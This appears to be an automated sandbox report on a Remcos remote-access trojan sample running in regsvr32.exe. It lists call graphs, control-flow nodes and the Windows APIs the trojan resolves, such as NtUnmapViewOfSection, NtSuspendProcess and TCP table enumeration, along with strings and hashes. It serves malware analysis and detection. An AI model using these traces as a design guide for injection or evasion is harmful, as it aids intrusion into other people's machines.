47197->46929 47198->46933 47199->46937 47200->46743 47202->46756 47203->46766 47204->46771 47205->46775 47206->46778 47312 2a1ad17 104 API calls 47207->47312 47209 2a1b4c5 LoadResource LockResource SizeofResource 47208->47209 47210 2a0f3de 47208->47210 47209->47210 47211 2a3bd51 47210->47211 47213 2a46137 ___crtLCMapStringA 47211->47213 47212 2a46175 47228 2a405dd 20 API calls __dosmaperr 47212->47228 47213->47212 47215 2a46160 RtlAllocateHeap 47213->47215 47227 2a42f80 7 API calls 2 library calls 47213->47227 47215->47213 47216 2a46173 47215->47216 47216->47035 47219 2a020bf 47218->47219 47229 2a023ce 47219->47229 47221 2a020ca 47233 2a0250a 47221->47233 47223 2a020d9 47223->47038 47225 2a020b7 28 API calls 47224->47225 47226 2a06dec 47225->47226 47226->47045 47227->47213 47228->47216 47230 2a02428 47229->47230 47231 2a023d8 47229->47231 47230->47221 47231->47230 47240 2a027a7 11 API calls std::_Deallocate 47231->47240 47234 2a0251a 47233->47234 47235 2a02520 47234->47235 47236 2a02535 47234->47236 47241 2a02569 47235->47241 47251 2a028e8 28 API calls 47236->47251 47239 2a02533 47239->47223 47240->47230 47252 2a02888 47241->47252 47243 2a0257d 47244 2a02592 47243->47244 47245 2a025a7 47243->47245 47257 2a02a34 22 API calls 47244->47257 47259 2a028e8 28 API calls 47245->47259 47248 2a0259b 47258 2a029da 22 API calls 47248->47258 47250 2a025a5 47250->47239 47251->47239 47253 2a02890 47252->47253 47254 2a02898 47253->47254 47260 2a02ca3 22 API calls 47253->47260 47254->47243 47257->47248 47258->47250 47259->47250 47262 2a020e7 47261->47262 47263 2a023ce 11 API calls 47262->47263 47264 2a020f2 47263->47264 47264->47054 47265->47054 47267 2a1ce41 47266->47267 47268 2a1ce51 47267->47268 47269 2a1cea0 47267->47269 47273 2a1ce89 47268->47273 47278 2a1cfe0 47268->47278 47270 2a1ceba 47269->47270 47271 2a1cfe0 28 API calls 47269->47271 47287 2a1d146 28 API calls 47270->47287 47271->47270 47286 2a1d146 28 API calls 47273->47286 47274 2a1ce9c 47274->47054 47277->47063 47280 2a1cfe8 47278->47280 47279 2a1d01a 47279->47273 47280->47279 47281 2a1d01e 47280->47281 47284 2a1d002 47280->47284 47298 2a02725 22 API calls 47281->47298 47288 2a1d051 47284->47288 47286->47274 47287->47274 47289 2a1d05b __EH_prolog 47288->47289 47299 2a02717 22 API calls 47289->47299 47291 2a1d06e 47300 2a1d15d 11 API calls 47291->47300 47293 2a1d094 47294 2a1d0cc 47293->47294 47301 2a02730 11 API calls 47293->47301 47294->47279 47296 2a1d0b3 47302 2a02712 11 API calls std::_Deallocate 47296->47302 47299->47291 47300->47293 47301->47296 47302->47294 47303->47077 47304->47082 47305->47079 47306->47096 47307->47096 47309->47174 47320 2a127ee 61 API calls 47319->47320 47322 2a431a8 _unexpected 47321->47322 47323 2a431c0 47322->47323 47324 2a432f6 _abort GetModuleHandleW 47322->47324 47343 2a45888 EnterCriticalSection 47323->47343 47326 2a431b4 47324->47326 47326->47323 47355 2a4333a GetModuleHandleExW 47326->47355 47327 2a43266 47344 2a432a6 47327->47344 47331 2a4323d 47334 2a43255 47331->47334 47364 2a441f5 5 API calls _ValidateLocalCookies 47331->47364 47332 2a43283 47347 2a432b5 47332->47347 47333 2a432af 47366 2a57729 5 API calls _ValidateLocalCookies 47333->47366 47365 2a441f5 5 API calls _ValidateLocalCookies 47334->47365 47335 2a431c8 47335->47327 47335->47331 47363 2a43f50 20 API calls _abort 47335->47363 47343->47335 47367 2a458d0 LeaveCriticalSection 47344->47367 47346 2a4327f 47346->47332 47346->47333 47368 2a48cc9 47347->47368 47350 2a432e3 47353 2a4333a _abort 8 API calls 47350->47353 47351 2a432c3 GetPEB 47351->47350 47352 2a432d3 GetCurrentProcess TerminateProcess 47351->47352 47352->47350 47354 2a432eb ExitProcess 47353->47354 47356 2a43364 GetProcAddress 47355->47356 47357 2a43387 47355->47357 47360 2a43379 47356->47360 47358 2a43396 47357->47358 47359 2a4338d FreeLibrary 47357->47359 47361 2a34fcb _ValidateLocalCookies 5 API calls 47358->47361 47359->47358 47360->47357 47362 2a433a0 47361->47362 47362->47323 47363->47331 47364->47334 47365->47327 47367->47346 47369 2a48ce4 47368->47369 47370 2a48cee 47368->47370 47372 2a34fcb _ValidateLocalCookies 5 API calls 47369->47372 47374 2a484ca 47370->47374 47373 2a432bf 47372->47373 47373->47350 47373->47351 47375 2a484fa 47374->47375 47379 2a484f6 47374->47379 47375->47369 47376 2a4851a 47376->47375 47378 2a48526 GetProcAddress 47376->47378 47380 2a48536 __crt_fast_encode_pointer 47378->47380 47379->47375 47379->47376 47381 2a48566 47379->47381 47380->47375 47382 2a48587 LoadLibraryExW 47381->47382 47383 2a4857c 47381->47383 47384 2a485a4 GetLastError 47382->47384 47387 2a485bc 47382->47387 47383->47379 47385 2a485af LoadLibraryExW 47384->47385 47384->47387 47385->47387 47386 2a485d3 FreeLibrary 47386->47383 47387->47383 47387->47386 47388 2a04e26 WaitForSingleObject 47389 2a04e40 SetEvent CloseHandle 47388->47389 47390 2a04e57 closesocket 47388->47390 47391 2a04ed8 47389->47391 47392 2a04e64 47390->47392 47393 2a04e7a 47392->47393 47401 2a050e4 83 API calls 47392->47401 47395 2a04e8c WaitForSingleObject 47393->47395 47396 2a04ece SetEvent CloseHandle 47393->47396 47402 2a1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47395->47402 47396->47391 47398 2a04e9b SetEvent WaitForSingleObject 47403 2a1e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47398->47403 47400 2a04eb3 SetEvent CloseHandle CloseHandle 47400->47396 47401->47393 47402->47398 47403->47400 47404 2a0165e 47405 2a01666 47404->47405 47406 2a01669 47404->47406 47407 2a016a8 47406->47407 47410 2a01696 47406->47410 47408 2a344ea new 22 API calls 47407->47408 47409 2a0169c 47408->47409 47411 2a344ea new 22 API calls 47410->47411 47411->47409

                                      Executed Functions

                                      Function 02A432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002,00000000), ref: 02A432D6
                                      • TerminateProcess.KERNEL32(00000000,?,02A4328B,00000000,02A6E948,0000000C,02A433E2,00000000,00000002,00000000), ref: 02A432DD
                                      • ExitProcess.KERNEL32 ref: 02A432EF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: aceb1ad295b8a7e35cbbf552428b308960017a575f5648c406d898e977a0ad4e
                                      • Instruction ID: b12fb6be2ee46b8be4d63c0ef2aa40de1e4ed3a7bcf2fefa072b60822cc887a0
                                      • Opcode Fuzzy Hash: aceb1ad295b8a7e35cbbf552428b308960017a575f5648c406d898e977a0ad4e
                                      • Instruction Fuzzy Hash: DEE0BF31881255EFCF526F54D949A9E7B6AFF80355F104454F9094A121CF3AD952CA80
                                      Function 02A1CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB65
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CB6E
                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB85
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CB88
                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CB9A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CB9D
                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CBAE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBB1
                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02A0E9E1), ref: 02A1CBC3
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBC6
                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02A0E9E1), ref: 02A1CBD2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBD5
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02A0E9E1), ref: 02A1CBE6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBE9
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02A0E9E1), ref: 02A1CBFA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CBFD
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02A0E9E1), ref: 02A1CC0E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC11
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02A0E9E1), ref: 02A1CC22
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC25
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02A0E9E1), ref: 02A1CC36
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC39
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02A0E9E1), ref: 02A1CC4A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC4D
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02A0E9E1), ref: 02A1CC5E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC61
                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02A0E9E1), ref: 02A1CC72
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC75
                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02A0E9E1), ref: 02A1CC83
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC86
                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,02A0E9E1), ref: 02A1CC97
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CC9A
                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,02A0E9E1), ref: 02A1CCA7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCAA
                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,02A0E9E1), ref: 02A1CCB7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCBA
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,02A0E9E1), ref: 02A1CCCC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCCF
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,02A0E9E1), ref: 02A1CCDC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCDF
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,02A0E9E1), ref: 02A1CCF0
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CCF3
                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,02A0E9E1), ref: 02A1CD04
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD07
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,02A0E9E1), ref: 02A1CD19
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD1C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,02A0E9E1), ref: 02A1CD29
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD2C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,02A0E9E1), ref: 02A1CD39
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD3C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,02A0E9E1), ref: 02A1CD49
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A1CD4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                      • API String ID: 4236061018-3687161714
                                      • Opcode ID: a2847f3162e16d7be7f6ae8d1bf627a16a2a99f305c19c53c2b5d0cc1c3b63f4
                                      • Instruction ID: 5cd1b6cf3f4d760fd529baef9ef62fd6de1168a6b15cdb92d771998bf236cac7
                                      • Opcode Fuzzy Hash: a2847f3162e16d7be7f6ae8d1bf627a16a2a99f305c19c53c2b5d0cc1c3b63f4
                                      • Instruction Fuzzy Hash: CC419DA4EC0358BAFB107BB65C4DD2B3F6EF989AB43014817B155A7110DFB8D8158FA8
                                      Function 02A0E9C5 Relevance: 48.0, APIs: 14, Strings: 13, Instructions: 795COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 5 2a0e9c5-2a0ea47 call 2a1cb50 GetModuleFileNameW call 2a0f3c3 call 2a020f6 * 2 call 2a1be1b call 2a0fb17 call 2a01e8d call 2a3fd00 22 2a0ea93-2a0eb5b call 2a01e65 call 2a01fab call 2a01e65 call 2a0531e call 2a06383 call 2a01fe2 call 2a01fd8 * 2 call 2a01e65 call 2a01fc0 call 2a05aa6 call 2a01e65 call 2a051e3 call 2a01e65 call 2a051e3 5->22 23 2a0ea49-2a0ea8e call 2a0fbb3 call 2a01e65 call 2a01fab call 2a10f37 call 2a0fb64 call 2a0f3b0 5->23 69 2a0eb5d-2a0eba8 call 2a06c1e call 2a01fe2 call 2a01fd8 call 2a01fab call 2a13549 22->69 70 2a0ebae-2a0ebc9 call 2a01e65 call 2a0b9bd 22->70 48 2a0eef2-2a0ef03 call 2a01fd8 23->48 69->70 102 2a0f34f-2a0f36a call 2a01fab call 2a139a9 call 2a12475 69->102 79 2a0ec03 call 2a0d069 70->79 80 2a0ebcb-2a0ebea call 2a01fab call 2a13549 70->80 87 2a0ec08-2a0ec0a 79->87 80->79 98 2a0ebec-2a0ec02 call 2a01fab call 2a139a9 80->98 90 2a0ec13-2a0ec1a 87->90 91 2a0ec0c-2a0ec0e 87->91 95 2a0ec1c 90->95 96 2a0ec1e-2a0ec2a call 2a1b2c3 90->96 94 2a0eef1 91->94 94->48 95->96 103 2a0ec33-2a0ec37 96->103 104 2a0ec2c-2a0ec2e 96->104 98->79 124 2a0f36f-2a0f3a0 call 2a1bc5e call 2a01f04 call 2a13a23 call 2a01f09 * 2 102->124 107 2a0ec76-2a0ec89 call 2a01e65 call 2a01fab 103->107 108 2a0ec39-2a0ec40 call 2a07716 103->108 104->103 129 2a0ec90-2a0ed18 call 2a01e65 call 2a1bc5e call 2a01f13 call 2a01f09 call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab 107->129 130 2a0ec8b call 2a07755 107->130 121 2a0ec42-2a0ec47 call 2a07738 call 2a07260 108->121 122 2a0ec4c-2a0ec5f call 2a01e65 call 2a01fab 108->122 121->122 122->107 141 2a0ec61-2a0ec67 122->141 157 2a0f3a5-2a0f3af call 2a0dd42 call 2a14f2a 124->157 177 2a0ed80-2a0ed84 129->177 178 2a0ed1a-2a0ed33 call 2a01e65 call 2a01fab call 2a3bad6 129->178 130->129 141->107 144 2a0ec69-2a0ec6f 141->144 144->107 147 2a0ec71 call 2a07260 144->147 147->107 180 2a0ef06-2a0ef66 call 2a36e90 call 2a0247c call 2a01fab * 2 call 2a136f8 call 2a09057 177->180 181 2a0ed8a-2a0ed91 177->181 178->177 205 2a0ed35-2a0ed3e call 2a01e65 178->205 233 2a0ef6b-2a0efbf call 2a01e65 call 2a01fab call 2a02093 call 2a01fab call 2a1376f call 2a01e65 call 2a01fab call 2a3baac 180->233 182 2a0ed93-2a0ee0d call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a0cdf9 181->182 183 2a0ee0f-2a0ee19 call 2a09057 181->183 192 2a0ee1e-2a0ee42 call 2a0247c call 2a34798 182->192 183->192 213 2a0ee51 192->213 214 2a0ee44-2a0ee4f call 2a36e90 192->214 215 2a0ed40-2a0ed7b call 2a01fab call 2a01e65 call 2a01fab call 2a0da34 call 2a01f13 call 2a01f09 205->215 216 2a0ee53-2a0eec8 call 2a01f04 call 2a3f809 call 2a0247c call 2a01fab call 2a0247c call 2a01fab call 2a13947 call 2a347a1 call 2a01e65 call 2a0b9bd 213->216 214->216 215->177 216->233 288 2a0eece-2a0eeed call 2a01e65 call 2a1bc5e call 2a0f474 216->288 286 2a0efc1 233->286 287 2a0efdc-2a0efde 233->287 289 2a0efc3-2a0efda call 2a1cd9b CreateThread 286->289 290 2a0efe0-2a0efe2 287->290 291 2a0efe4 287->291 288->233 306 2a0eeef 288->306 294 2a0efea-2a0f0c6 call 2a02093 * 2 call 2a1b4ef call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a3baac call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab StrToIntA call 2a09de4 call 2a01e65 call 2a01fab 289->294 290->289 291->294 344 2a0f101 294->344 345 2a0f0c8-2a0f0ff call 2a344ea call 2a01e65 call 2a01fab CreateThread 294->345 306->94 347 2a0f103-2a0f11b call 2a01e65 call 2a01fab 344->347 345->347 356 2a0f159-2a0f16c call 2a01e65 call 2a01fab 347->356 357 2a0f11d-2a0f154 call 2a344ea call 2a01e65 call 2a01fab CreateThread 347->357 368 2a0f1cc-2a0f1df call 2a01e65 call 2a01fab 356->368 369 2a0f16e-2a0f1c7 call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a0d9e8 call 2a01f13 call 2a01f09 CreateThread 356->369 357->356 379 2a0f1e1-2a0f215 call 2a01e65 call 2a01fab call 2a01e65 call 2a01fab call 2a3baac call 2a0c162 368->379 380 2a0f21a-2a0f23e call 2a1b60d call 2a01f13 call 2a01f09 368->380 369->368 379->380 400 2a0f240 380->400 401 2a0f243-2a0f256 CreateThread 380->401 400->401 404 2a0f264-2a0f26b 401->404 405 2a0f258-2a0f262 CreateThread 401->405 408 2a0f279-2a0f280 404->408 409 2a0f26d-2a0f277 CreateThread 404->409 405->404 412 2a0f282-2a0f285 408->412 413 2a0f28e 408->413 409->408 415 2a0f287-2a0f28c 412->415 416 2a0f2cc-2a0f2e7 call 2a01fab call 2a134ff 412->416 418 2a0f293-2a0f2c7 call 2a02093 call 2a052fd call 2a02093 call 2a1b4ef call 2a01fd8 413->418 415->418 416->157 428 2a0f2ed-2a0f32d call 2a1bc5e call 2a01f04 call 2a1361b call 2a01f09 call 2a01f04 416->428 418->416 443 2a0f346-2a0f34b DeleteFileW 428->443 444 2a0f34d 443->444 445 2a0f32f-2a0f332 443->445 444->124 445->124 446 2a0f334-2a0f341 Sleep call 2a01f04 445->446 446->443
                                      APIs
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB65
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CB6E
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02A0E9E1), ref: 02A1CB85
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CB88
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CB9A
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CB9D
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02A0E9E1), ref: 02A1CBAE
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBB1
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02A0E9E1), ref: 02A1CBC3
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBC6
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02A0E9E1), ref: 02A1CBD2
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBD5
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02A0E9E1), ref: 02A1CBE6
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBE9
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02A0E9E1), ref: 02A1CBFA
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CBFD
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02A0E9E1), ref: 02A1CC0E
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC11
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02A0E9E1), ref: 02A1CC22
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC25
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02A0E9E1), ref: 02A1CC36
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC39
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02A0E9E1), ref: 02A1CC4A
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC4D
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02A0E9E1), ref: 02A1CC5E
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC61
                                        • Part of subcall function 02A1CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02A0E9E1), ref: 02A1CC72
                                        • Part of subcall function 02A1CB50: GetProcAddress.KERNEL32(00000000), ref: 02A1CC75
                                        • Part of subcall function 02A1CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02A0E9E1), ref: 02A1CC83
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104), ref: 02A0E9EE
                                        • Part of subcall function 02A10F37: __EH_prolog.LIBCMT ref: 02A10F3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                      • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\regsvr32.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                      • API String ID: 2830904901-1950130056
                                      • Opcode ID: f898690b16231d374da2b8fcdd45c02775b4925b1e576bf294b5e613800e6df8
                                      • Instruction ID: e9b464dc2303ee5019f74e39a52e3c831c1bfd96bc7308875affc711f358ac25
                                      • Opcode Fuzzy Hash: f898690b16231d374da2b8fcdd45c02775b4925b1e576bf294b5e613800e6df8
                                      • Instruction Fuzzy Hash: 36320960FC43402BEA25B770BEE5BBE679B9F81750F80085FA5469B1C0DFA88D058F95
                                      Function 02A04E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,02A74EF8,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E38
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E43
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E4C
                                      • closesocket.WS2_32(?), ref: 02A04E5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04E91
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EA2
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EA9
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EBA
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EBF
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04EC4
                                      • SetEvent.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04ED1
                                      • CloseHandle.KERNEL32(?,?,00000000,02A74EF8,02A04CA8,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04ED6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                      • String ID:
                                      • API String ID: 3658366068-0
                                      • Opcode ID: 3df4f971ab8a24296d0750490abac40a08e55de67e08165edf36dd6e55253d8f
                                      • Instruction ID: 45df83566362e7af71ce2758b55b4d1085169e73ce58e025c8d37187e9fbc1dc
                                      • Opcode Fuzzy Hash: 3df4f971ab8a24296d0750490abac40a08e55de67e08165edf36dd6e55253d8f
                                      • Instruction Fuzzy Hash: 39210C31440B159FDB216B25EC89B1BB7A2FF44325F104A19E1E205AF0CF61A821DF54
                                      Function 02A48566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 465 2a48566-2a4857a 466 2a48587-2a485a2 LoadLibraryExW 465->466 467 2a4857c-2a48585 465->467 469 2a485a4-2a485ad GetLastError 466->469 470 2a485cb-2a485d1 466->470 468 2a485de-2a485e0 467->468 471 2a485bc 469->471 472 2a485af-2a485ba LoadLibraryExW 469->472 473 2a485d3-2a485d4 FreeLibrary 470->473 474 2a485da 470->474 476 2a485be-2a485c0 471->476 472->476 473->474 475 2a485dc-2a485dd 474->475 475->468 476->470 477 2a485c2-2a485c9 476->477 477->475
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,02A4850D,?,00000000,00000000,00000000,?,02A48839,00000006,FlsSetValue), ref: 02A48598
                                      • GetLastError.KERNEL32(?,02A4850D,?,00000000,00000000,00000000,?,02A48839,00000006,FlsSetValue,02A5F160,02A5F168,00000000,00000364,?,02A482E7), ref: 02A485A4
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02A4850D,?,00000000,00000000,00000000,?,02A48839,00000006,FlsSetValue,02A5F160,02A5F168,00000000), ref: 02A485B2
                                      Memory Dump Source
